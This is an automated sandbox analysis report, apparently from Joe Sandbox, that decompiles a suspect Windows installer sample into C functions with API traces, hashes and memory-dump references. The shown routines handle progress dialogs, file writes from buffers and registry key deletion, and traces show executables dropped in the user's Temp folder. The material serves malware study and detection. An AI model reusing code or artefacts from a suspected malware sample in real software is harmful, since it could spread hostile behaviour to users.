stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004056D0(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x7a7a84;
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x7a8b54;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E004066AB(_t38, 0, 0x7a0f68, 0x7a0f68, _a4);
					}
					_t27 = lstrlenW(0x7a0f68);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x7a7a68, 0x7a0f68);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x7a0f68;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x7a0f68[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x7a0f68, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

0x004056d6
0x004056e0
0x004056e5
0x004056eb
0x004056f6
0x004056f9
0x004056fc
0x00405702
0x00405702
0x00405708
0x00405710
0x00405713
0x00405730
0x00405734
0x0040573d
0x0040573d
0x00405747
0x00405750
0x0040575c
0x00405763
0x00405767
0x0040576a
0x0040577d
0x0040578b
0x0040578b
0x0040578f
0x00405791
0x00405794
0x00000000
0x00405794
0x00405715
0x0040571d
0x00405725
0x0040572b
0x00000000
0x0040572b
0x00405725
0x00405713
0x004057a0

APIs

lstrlenW.KERNEL32(007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405708
lstrlenW.KERNEL32(004030A8,007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405718
lstrcatW.KERNEL32(007A0F68,004030A8), ref: 0040572B
SetWindowTextW.USER32(007A0F68,007A0F68), ref: 0040573D
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405763
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040577D
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040578B

Part of subcall function 004066AB: lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtbl,\Microsoft\Internet Explorer\Quick Launch), ref: 00406850
Part of subcall function 004066AB: lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtbl,00000000,007A0F68,?,00405707,007A0F68,00000000), ref: 004068AA

Memory Dump Source

Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSendlstrlen$lstrcat$TextWindow
String ID:
API String ID: 1495540970-0
Opcode ID: 5359f18cea5025c05ea2e312da5c850c9979a77eaabc6fad8f28e044c716b6a3
Instruction ID: b1df74b24ef97eccf04675f52fbaffa54a328febca5869b92639b2b84e823bb6
Opcode Fuzzy Hash: 5359f18cea5025c05ea2e312da5c850c9979a77eaabc6fad8f28e044c716b6a3
Instruction Fuzzy Hash: 32219D71900518FACF119FA5DD84ACFBFB8EF85350F10842AF904B6290C7794A40DFA8

Uniqueness

Uniqueness Score: -1.00%

Function 004068F5 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E004068F5(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405FB4(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405F6A(L"*?|<>/\":", _t5))) == 0) {
							E00406119(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}

0x004068f7
0x00406900
0x00406917
0x00406917
0x0040691e
0x0040692a
0x0040692a
0x0040692d
0x00406930
0x00406935
0x00406937
0x00406940
0x00406944
0x00406961
0x00406969
0x00406969
0x0040696e
0x00406970
0x00406973
0x00406978
0x00406979
0x0040697d
0x0040697d
0x0040697e
0x00406985
0x00406987
0x0040698e
0x00000000
0x00000000
0x00406996
0x0040699c
0x00000000
0x00000000
0x00000000
0x0040699c
0x004069a1

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00000000,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,00403621,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00406958
CharNextW.USER32(?,?,?,00000000,?,00403621,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00406967
CharNextW.USER32(?,00000000,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,00403621,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 0040696C
CharPrevW.USER32(?,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,00403621,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 0040697F

Strings

*?|<>/":, xrefs: 00406947
C:\Users\user\AppData\Local\Temp\, xrefs: 004068F6

Memory Dump Source

Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-4010320282
Opcode ID: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
Instruction ID: be6858c8d4b602c62de40fdc636a35535680886f1e3ed17f643e47e9e10769a1
Opcode Fuzzy Hash: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
Instruction Fuzzy Hash: 0D11E6A580060295DB302B148C40A7762E8AF94750F12403FE98AB36C1E7BC4CA2C6BD

Uniqueness

Uniqueness Score: -1.00%

Function 0040302E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040302E(intOrPtr _a4) {
				short _v132;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x79f73c;
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x79f73c = 0;
					return _t15;
				}
				if( *0x79f73c != 0) {
					return E00406A77(0);
				}
				_t6 = GetTickCount();
				if(_t6 >  *0x7a8aac) {
					if( *0x7a8aa8 == 0) {
						_t7 = CreateDialogParamW( *0x7a8aa0, 0x6f, 0, E00402F93, 0);
						 *0x79f73c = _t7;
						return ShowWindow(_t7, 5);
					}
					if(( *0x7a8b54 & 0x00000001) != 0) {
						wsprintfW( &_v132, L"... %d%%", E00403012());
						return E004056D0(0,  &_v132);
					}
				}
				return _t6;
			}

0x0040303d
0x0040303f
0x00403046
0x00403049
0x00403049
0x0040304f
0x00000000
0x0040304f
0x0040305d
0x00000000
0x00403060
0x00403067
0x00403073
0x0040307b
0x004030b9
0x004030c2
0x00000000
0x004030c7
0x00403084
0x00403095
0x00000000
0x004030a3
0x00403084
0x004030cf

APIs

DestroyWindow.USER32(?,00000000), ref: 00403049
GetTickCount.KERNEL32 ref: 00403067
wsprintfW.USER32 ref: 00403095

Part of subcall function 004056D0: lstrlenW.KERNEL32(007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405708
Part of subcall function 004056D0: lstrlenW.KERNEL32(004030A8,007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405718
Part of subcall function 004056D0: lstrcatW.KERNEL32(007A0F68,004030A8), ref: 0040572B
Part of subcall function 004056D0: SetWindowTextW.USER32(007A0F68,007A0F68), ref: 0040573D
Part of subcall function 004056D0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405763
Part of subcall function 004056D0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040577D
Part of subcall function 004056D0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040578B

CreateDialogParamW.USER32 ref: 004030B9
ShowWindow.USER32(00000000,00000005), ref: 004030C7

Part of subcall function 00403012: MulDiv.KERNEL32(?,00000064,?), ref: 00403027

Strings

... %d%%, xrefs: 0040308F

Memory Dump Source

Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: 54489552992201bc3988819c72fa622d06d96af98b9c9b950ef7c711f1b17aa9
Instruction ID: 36a9105e1bf518e5a00a94211bbaadb265df24d4843d4ed97aac6270594080be
Opcode Fuzzy Hash: 54489552992201bc3988819c72fa622d06d96af98b9c9b950ef7c711f1b17aa9
Instruction Fuzzy Hash: 40015B70413610ABC7217FA0AD49A9A7FACAB01B06F50853BF441F25E9DA7C46458B9E

Uniqueness

Uniqueness Score: -1.00%

Function 00404F85 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404F85(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}

0x00404f93
0x00404fa0
0x00404fa6
0x00404fe4
0x00404fe4
0x00404ff3
0x00404ffa
0x00000000
0x00404ffc
0x00404fa8
0x00404fb7
0x00404fbf
0x00404fc2
0x00404fd4
0x00404fda
0x00404fe1
0x00000000
0x00404fe1
0x00000000

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404FA0
GetMessagePos.USER32 ref: 00404FA8
ScreenToClient.USER32 ref: 00404FC2
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404FD4
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404FFA

Strings

f, xrefs: 00404FD6

Memory Dump Source

Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
Instruction ID: 51d4338ac073bbeac8b2964ce5aa15998fcdd55d82c6f64f668885239b8ba4c4
Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
Instruction Fuzzy Hash: D6015E7194021DBADB00DBA5DD85FFEBBBCAF54711F10012BBB50B61C0D7B49A058BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00402F93 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				void* _t11;
				WCHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00403012();
					_t19 = L"unpacking data: %d%%";
					if( *0x7a8ab0 == 0) {
						_t19 = L"verifying installer: %d%%";
					}
					wsprintfW( &_v132, _t19, _t11);
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}

0x00402fa3
0x00402fb1
0x00402fb7
0x00402fb7
0x00402fc5
0x00402fc7
0x00402fd3
0x00402fd8
0x00402fda
0x00402fda
0x00402fe5
0x00402ff5
0x00403007
0x00403007
0x0040300f

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
wsprintfW.USER32 ref: 00402FE5
SetWindowTextW.USER32(?,?), ref: 00402FF5
SetDlgItemTextW.USER32 ref: 00403007

Strings

unpacking data: %d%%, xrefs: 00402FD3, 00402FE3
verifying installer: %d%%, xrefs: 00402FDA

Memory Dump Source

Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: 863410c55cf87ff373a2389e5224159976098539ce34d2f9597aa36d95ce2bb5
Instruction ID: 8fb0b87627a2e5c232f470bc2292a7be8d93e7e9342cf65e243ccc0cc3a46c1c
Opcode Fuzzy Hash: 863410c55cf87ff373a2389e5224159976098539ce34d2f9597aa36d95ce2bb5
Instruction Fuzzy Hash: 74F0367050020DABEF246F50DD49BEA3B69EB40309F00C03AF606B51D0DBBD99549B59

Uniqueness

Uniqueness Score: -1.00%

Function 00402950 Relevance: 9.1, APIs: 6, Instructions: 91
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00402950(void* __ebx) {
				WCHAR* _t26;
				void* _t29;
				long _t37;
				void* _t49;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t59;
				void* _t60;
				void* _t61;

				_t49 = __ebx;
				_t52 = 0xfffffd66;
				_t26 = E00402DA6(0xfffffff0);
				_t55 = _t26;
				 *(_t61 - 0x40) = _t26;
				if(E00405FB4(_t26) == 0) {
					E00402DA6(0xffffffed);
				}
				E00406139(_t55);
				_t29 = E0040615E(_t55, 0x40000000, 2);
				 *(_t61 + 8) = _t29;
				if(_t29 != 0xffffffff) {
					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
					if( *(_t61 - 0x28) != _t49) {
						_t37 =  *0x7a8ab4;
						 *(_t61 - 0x44) = _t37;
						_t54 = GlobalAlloc(0x40, _t37);
						if(_t54 != _t49) {
							E004035FE(_t49);
							E004035E8(_t54,  *(_t61 - 0x44));
							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
							 *(_t61 - 0x10) = _t59;
							if(_t59 != _t49) {
								E00403377(_t51,  *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
								while( *_t59 != _t49) {
									_t51 =  *_t59;
									_t60 = _t59 + 8;
									 *(_t61 - 0x3c) =  *_t59;
									E00406119( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
									_t59 = _t60 +  *(_t61 - 0x3c);
								}
								GlobalFree( *(_t61 - 0x10));
							}
							E00406210( *(_t61 + 8), _t54,  *(_t61 - 0x44));
							GlobalFree(_t54);
							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
						}
					}
					_t52 = E00403377(_t51,  *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
					CloseHandle( *(_t61 + 8));
				}
				_t56 = 0xfffffff3;
				if(_t52 < _t49) {
					_t56 = 0xffffffef;
					DeleteFileW( *(_t61 - 0x40));
					 *((intOrPtr*)(_t61 - 4)) = 1;
				}
				_push(_t56);
				E00401423();
				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t61 - 4));
				return 0;
			}

0x00402950
0x00402952
0x00402957
0x0040295c
0x0040295f
0x00402969
0x0040296d
0x0040296d
0x00402973
0x00402980
0x00402988
0x0040298b
0x00402997
0x0040299a
0x004029a0
0x004029ae
0x004029b3
0x004029b7
0x004029ba
0x004029c3
0x004029cf
0x004029d3
0x004029d6
0x004029e0
0x004029ff
0x004029e7
0x004029ec
0x004029f4
0x004029f7
0x004029fc
0x004029fc
0x00402a06
0x00402a06
0x00402a13
0x00402a19
0x00402a1f
0x00402a1f
0x004029b7
0x00402a33
0x00402a35
0x00402a35
0x00402a3f
0x00402a40
0x00402a44
0x00402a48
0x00402a4e
0x00402a4e
0x00402a55
0x004022f1
0x00402c2d
0x00402c39

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
GlobalFree.KERNEL32 ref: 00402A06
GlobalFree.KERNEL32 ref: 00402A19
CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48

Memory Dump Source

Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 01061f3d3ca3a4d7c364cd067c19041a51f9a0b08810e1f4a161c9a0c4070a25
Instruction ID: ec4356a3eb6c7711b506d5a245a30aad41ccfdb787a60eec272099fea1c037c4
Opcode Fuzzy Hash: 01061f3d3ca3a4d7c364cd067c19041a51f9a0b08810e1f4a161c9a0c4070a25
Instruction Fuzzy Hash: D431C271D00124BBCF216FA9CE49DDEBE79AF49364F14023AF450762E1CB798D419B98

Uniqueness

Uniqueness Score: -1.00%

Function 00402EA9 Relevance: 7.6, APIs: 5, Instructions: 84
registryCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				short _v536;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E004064DB(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v536);
						_push(0);
						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v536);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E00406A3B(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyW(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}

0x00402eb4
0x00402ebd
0x00402ec6
0x00402ed2
0x00402edb
0x00402ee5
0x00402f0a
0x00402f10
0x00402f15
0x00402f16
0x00402f46
0x00402f1f
0x00402f21
0x00402f71
0x00402f74
0x00000000
0x00402f7a
0x00402f30
0x00402f35
0x00402f37
0x00000000
0x00000000
0x00402f3f
0x00402f44
0x00402f45
0x00402f45
0x00402f52
0x00402f5a
0x00402f61
0x00000000
0x00402f8a
0x00000000
0x00402f69
0x00402ef5
0x00402f08
0x00000000
0x00000000
0x00000000
0x00402f08
0x00402f90

APIs

RegEnumValueW.ADVAPI32 ref: 00402EFD
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74

Memory Dump Source

Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
Instruction ID: e84adf69fee3246f56ef13a6fd4e717e0861f51d99737fac189c4d1833cff19f
